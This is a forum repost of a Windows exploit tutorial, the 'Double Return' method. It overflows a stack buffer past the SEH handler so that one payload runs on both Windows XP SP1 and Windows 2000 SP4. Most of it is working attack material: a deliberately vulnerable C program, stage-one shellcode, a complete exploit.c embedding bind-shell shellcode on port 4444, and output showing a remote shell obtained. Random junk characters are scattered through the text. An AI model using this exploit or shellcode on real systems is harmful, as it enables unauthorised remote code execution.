The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.; B$ ?$ i5 q* s4 p/ R
" k1 d4 ?6 I+ E; p, }4 t9 n[Buf] <- Shellcode6 v5 `! d& W% U" Z
[Return Address] <- jmp register (for Windows XP sp1) 8 a }1 c4 t! N* v! F- k' G" z[Various Stack Data] <- Junk) w/ T0 U# N7 E& Z4 m* S' L
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward# x! B) H, {4 B: N. z+ J1 U
[SE Handler] <- jmp register (for Win2k sp4) % n B/ y1 {# u[Stage1 Shellcode] <- stage1 shellcode for win2k 3 n9 j& z0 I3 n6 z+ r1 l' l( g5 ? Y: G/ o
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses 9 G8 v9 v. ~7 p7 M8 \) L7 w7 q* V+ F) u3 J$ Z. f2 `1 ]) u7 T
Necessary Tools:, T% u5 _1 u5 d$ s
- OllyDBG, E+ u0 U+ z# h: R/ k9 I' L
- C/C++ Compiler \% `3 b- Q. [4 U0 a* J- nasm6 f' m' q) Y, O( W4 ]& Z0 ]
- Sac' q4 p3 ` m8 e1 X. @+ j* R* P
% y" b7 B9 m$ c2 ~* w
Vulnerable Code: / l# S* k8 b+ _* S U/ ]3 {. `//lamebuf.c, }* ^% c& t; W$ Q
#include<stdio.h> N: X; G+ I$ F7 C7 e- Z. U2 B6 h#include<string.h>3 i" {$ l! o) T- |
#include<windows.h> # D' P% e, ^4 Z$ z5 t; v6 t' bint main(int argc,char *argv[]){ 2 _( ~0 a- C( B+ H0 |" m8 S& b* C/ w3 x
char buf[512];8 P) l! H6 n6 W, ^
char buf1[1024]; // <- simulate a stack2 s; h: @$ L: F( |8 \
//DebugBreak();) s- h. e* m! q) h+ g7 J
if (argc != 2){ return -1; } 7 Y0 u- }$ [: z8 S" I. Q% a4 U- Y: i2 ^
strcpy(buf,argv[1]); 8 z8 \- h; M/ Kreturn 0x0;: | {( t" _; ]3 o, I
}, U: f- j5 w; q% O. Q
$ E) }7 M' J$ z$ L) ?7 BGetting Started:) c* a* E0 }) P, [( Z
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:; Z" a. q+ w% O$ G# h# g
! H! I' ?/ r' X" n* TEAX 00000000 # {& b/ K( J" [. Y; X( _ECX 00321404 + K$ @; [/ V/ ^; T3 D- _- @1 EEDX 00414141, z# Z4 e8 w8 X% t. p& v! ?6 t
EBX 7FFDF000 3 X7 h l+ @ y% w- hESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"1 h$ Y& W3 h! N( ^7 E+ b. D6 R' u
EBP 414141419 x% L9 \5 c4 q% m
ESI 77D4595F * Y' p# m( v, B- `, {" qEDI 77F59037 ntdll.77F590372 Q/ s0 x0 X: H
EIP 41414141 , ?* t+ D+ s7 c% @- C& s; V 5 h6 P R/ V/ Q% aLets take a look at the stack and see what happened to the default exception handler:# n% G3 g1 {5 U" i; a: k
0x0012FFB0 41414141 Pointer to next SEH Record: _3 q, Q' g2 G. }" k) j, u
0x0012FFB4 41414141 SE Handler v9 ~/ M" I! C F& I+ r7 Y1 V6 v6 V. s# e; [
We successfully overwrote the return address and the default exception handler. * Y- y! ]; T( _) v/ y( b2 O/ W9 f2 A y" K! |
Primary Return Address (Windows XP SP1 EN):% X$ s1 s5 x; M c0 i+ ~) o7 ~: ?+ X
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:+ C' R- ^5 O# R- X# l U
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4" / a7 ~5 [( E8 t 9 G# @1 P ^$ y1 WSecondary Return Address (Windows 2000 SP4 EN):6 {4 Z2 o; c9 L- I( Q
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be: 8 y4 d8 v: n; `# l4 K2 h% E"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1". S4 m" o! F$ @% p' J3 t- w/ i
. s( Q3 Z* L# j; F& h( ]4 KProof Of Concept:( B! e& v3 u; b. b: a
// exploit.c ) B: h+ f2 Z* U( S2 l// Tal zeltzer - [Double Return] //' A* [/ X3 t# C' P' D6 B9 |4 d
& Q$ d: Y+ H4 E2 \% v6 ~
#include<stdio.h> : V: x1 f+ r' U2 \5 k. M+ \#include<string.h> ( X6 j6 }+ N- m/ w# k: N6 L( ^#include<windows.h>9 C0 C! z" m* W6 o P1 T$ `9 t: P- `
/ o9 C7 s9 y8 Y#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp 0 I& A8 Z6 Y7 s#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx/ m2 r P# R+ ~2 I' Z$ H
$ \; D/ Y; j. y// Stage1 For WinXP Sp1 English( R, R' {' q7 q6 i
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";3 @/ K/ ~4 S* k
3 _! i2 j/ [ v7 t// Stage1 For Win2k Sp4 English 1 g# e N" f" u: x! Z$ Kunsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"; 2 p2 ^" ^& J/ h+ U/ t& m 0 R8 @3 z# q% L& h. ]6 u! A// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com) ]# _1 n# K, D& z4 i; X! Y1 x
unsigned char shellcode[] =6 u Q4 G4 d) |& O6 G
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85". @; l) k/ Q; G! R2 _5 {9 `7 r" }
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"9 E4 j! s2 O0 o/ f; K! ~
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05" 4 v+ a; G( G. [6 |% Z- A1 z"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0". _6 Q7 `* `+ o0 s9 f2 Y
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"' H* W/ R: w( ?; }5 p- R
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"- Z8 M( e3 k( ^1 W
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"0 N t, b5 C- @ | j# `$ J1 I& k8 y
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"0 D+ r, E' ^, J; t2 C7 v! `% d
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce" t' _) c2 `- S: E4 m5 h
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf" ! r9 { Y" A' u- p5 p"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb": l' q2 Y4 L; N% ^! o# K9 v$ c
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"( Q; q* n: a! ^9 Z
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6" # K$ v# ~! b. v' S) [9 K"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16" m! F/ i+ W2 A! q7 d9 s& l. o0 O' B
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f" ) A' H0 H; Q* L" B"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"6 ?! R1 n6 o+ d7 v
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"+ m4 e3 W [) K: [& G. J
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"0 P! q: i( v6 w2 R7 S1 l, A/ p
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8" 0 l& u! J/ X* y% H) K, J"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e" % ?5 F# s* ^/ f"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"& E9 g& J! L) l6 o! e' i
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27" ' a8 p) x9 c, L: O# p& D& T"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2" ) X4 ?! `" r1 z- c; O7 K"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a" 1 e1 E- n5 j( h4 {( i$ G' n5 H1 p% F"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";' y. d* F8 K H, {4 b
, N7 L5 A0 I" z6 ~$ M
: y8 @4 V9 E8 Y3 p, A' C
int main(int argc,char *argv[]){ ) X. F v% d) [ " C- Z: _+ N$ d) E" M, O8 bchar *bufExe[3];- Z8 Y& t5 l- G+ J7 i: B. @; G
char buf[2048]; , @: n6 S' Q' dbufExe[0] = "lamebuf.exe"; ' D* h* B7 g+ P# H% L+ d& s6 cbufExe[2] = NULL;0 A: w& R4 Q- K9 |; [6 D# P
+ X& Z- O" z1 ~7 c; \2 v: Fmemset(buf,0x0,sizeof(buf)); . {; w7 m2 O& ?( |+ wmemset(buf,0x90,1652);& Y' w9 ] g1 u/ o& }# E3 E) U
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);( D! x$ [! b6 A. M7 ]1 \; B
, j n7 N/ s8 l
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode * ]+ q, h" w: Q, B/ wmemcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode 8 b) q& `- N* w9 o5 R: `' k; O: ^" Q* s2 j
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en + F3 ^1 a( y" L$ c3 F- p*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code% Y' O; u o& E9 y; a3 J
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en- @6 a' d6 q' ?2 p2 C
( C' M8 @: q+ c1 _9 Y) l: ]# N1 ^8 o" N. f5 a
bufExe[1] = buf;' H6 j1 p, I l: }+ ?
//Execute the vulnerable application* n+ F# n+ n+ x8 j5 S, u
execve(bufExe[0],bufExe,NULL); ! r7 b" u# V/ F6 o5 b3 J! j ( i1 w2 t0 q+ n+ N3 \# nreturn 0x0;2 n( r* O. z- l" K
}2 j' q/ z4 N6 W+ r$ k) B
8 }) k: `1 s* H, K3 P% H) i
Exploit under Windows XP SP1:! X/ u' p: i4 B p2 [( X% \
C:\>exploit / Z! }+ X% d- UC:\>- v J' p, S% g5 r3 p5 ^" |- N
C:\>telnet 127.0.0.1 44446 S' x. o: Y, n& G
: I+ l0 K, f) y' F3 mMicrosoft Windows XP [Version 5.1.2600] # j5 @* u: O9 k3 b(C) Copyright 1985-2001 Microsoft Corp. ' H2 ^/ e4 f9 R# Q: j* Y8 N# ~& [5 ]) i o
C:\> : n4 d1 |5 S3 D/ n7 L3 d% U0 I: ?8 A" J4 t/ @& z9 O0 N b
Exploit under Windows 2000 SP4:% ?0 d2 E3 k2 }9 L* L* K% Z5 @# ~; \
C:\>exploit 0 D/ ^2 {" b% e0 u* ^$ \* jC:\>) S+ I' }6 i' \1 u+ r
C:\>telnet 127.0.0.1 4444 . R3 S" B$ L4 R. W. j0 b) A9 E4 Z ! W) @! X9 S' @- O1 UMicrosoft Windows 2000 [Version 5.00.2195] 4 v; W# K$ E; t7 N(C) Copyright 1985-2000 Microsoft Corp.
IP卡
狗仔卡
发表于 2004-11-19 10:39
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
